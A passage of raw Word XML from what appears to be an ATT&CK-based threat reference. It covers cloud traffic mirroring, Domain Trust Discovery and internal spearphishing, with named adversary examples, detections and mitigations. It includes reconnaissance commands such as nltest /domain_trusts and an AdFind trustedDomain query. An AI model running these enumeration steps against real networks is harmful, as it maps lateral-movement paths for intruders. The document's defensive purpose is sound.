    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Compromises internal credentials even without phishing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C72EA3" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72EA3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Cloud Traffic Mirroring for Cleartext Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Abuse services like AWS Traffic Mirroring or Azure vTap to copy VM traffic to adversary-controlled instances. TLS termination at load balancers often leaves internal traffic unencrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: Attackers mirrored VPC traffic to capture database credentials, exfiltrating logs via Transfer Data to Cloud Account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Exposes cloud admin credentials or API keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Encrypt internal traffic (TLS/IPsec) and disable LLMNR/NBT-NS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Restrict cloud traffic mirroring permissions using IAM policies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>3) Technique: Domain Trust Discovery (T1482)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Definition: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversaries enumerate trust relationships between Active Directory domains/forests to identify lateral movement paths. Trusts allow users in one domain to access resources in another, enabling attacks like SID-His</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>tory Injection or Kerberoasting</w:t>
      </w:r>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C72EA3" w:rsidRDefault="00C72EA3" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidR="00C177F6" w:rsidRPr="00C72EA3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C72EA3" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72EA3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Nltest for Trust Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Execute nltest /domain_trusts /all_trusts to list all trusted domains, including trust type (e.g., bidirectional) and status. This native Windows tool requires no installation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: TrickBot used nltest to map trust relationships, prioritizing domains with weaker security for lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Identifies paths to high-value domains (e.g., finance or R&amp;D segments).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C72EA3" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72EA3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>LDAP Queries for Federated Trusts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Use tools like AdFind or PowerShell to query LDAP for (objectClass=trustedDomain). This reveals cross-forest trusts and authentication protocols (e.g., Kerberos vs. NTLM).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: APT29 leveraged AdFind.exe -f objectclass=trusteddomain during the SolarWinds breach to discover federated Azure AD trusts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Exposes hybrid cloud/on-premises trust boundaries for cross-environment attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C72EA3" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72EA3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Flag nltest /domain_trusts or LDAP queries for trustedDomain from non-admin workstations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Monitor for DSEnumerateDomainTrusts() API calls in process memory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F34F9E" w:rsidRPr="008B486A" w:rsidRDefault="00264887" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F34F9E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Late</w:t>
      </w:r>
      <w:r w:rsidR="00F34F9E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ral Movement</w:t>
      </w:r>
      <w:r w:rsidR="00C72EA3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B486A" w:rsidRPr="008B486A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tactic (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRDefault="008B486A" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement involves techniques adversaries use to pivot through networks after initial compromise. By exploring connected systems, escalating privileges, and accessing restricted resources, adversaries move closer to high-value targets like databases or domain controllers. This phase often precedes data theft or system disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRDefault="008B486A" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>1) Technique: Internal Spearphishing (T1534)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries send tailored phishing emails from compromised internal accounts to bypass email filters and exploit employee trust. Unlike external spearphishing, this leverages existing access to hijack legitimate communication channels 710.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0073177B" w:rsidRDefault="0073177B" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="0073177B" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Compromised HR Email for Payroll Theft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries use stolen HR credentials to send "urgent payroll update" emails with malicious links. The emails mimic internal templates and use legitimate sender addresses (e.g., hr@company.com).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: FIN7 impersonated corporate IT to send SharePoint links that installed Carbanak malware. Employees clicked due to perceived legitimacy, enabling lateral movement to finance systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Bypasses email gateways (DMARC/SPF pass) and steals credentials via fake login pages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0073177B" w:rsidRPr="0073177B" w:rsidRDefault="0073177B" w:rsidP="0073177B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="0073177B" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Meeting Invites with Malicious Attachments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Attackers send calendar invites from compromised executive accounts (e.g., "Budget Planning Meeting.ppsx"). The attachment executes macros to deploy backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: APT29 hijacked a CEO’s email to send invites titled "Q3 Strategy," delivering Cobalt Strike beacons to 50+ employees. The attack spread to R&amp;D servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Evades detection as internal-to-internal email traffic is rarely scrutinized</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
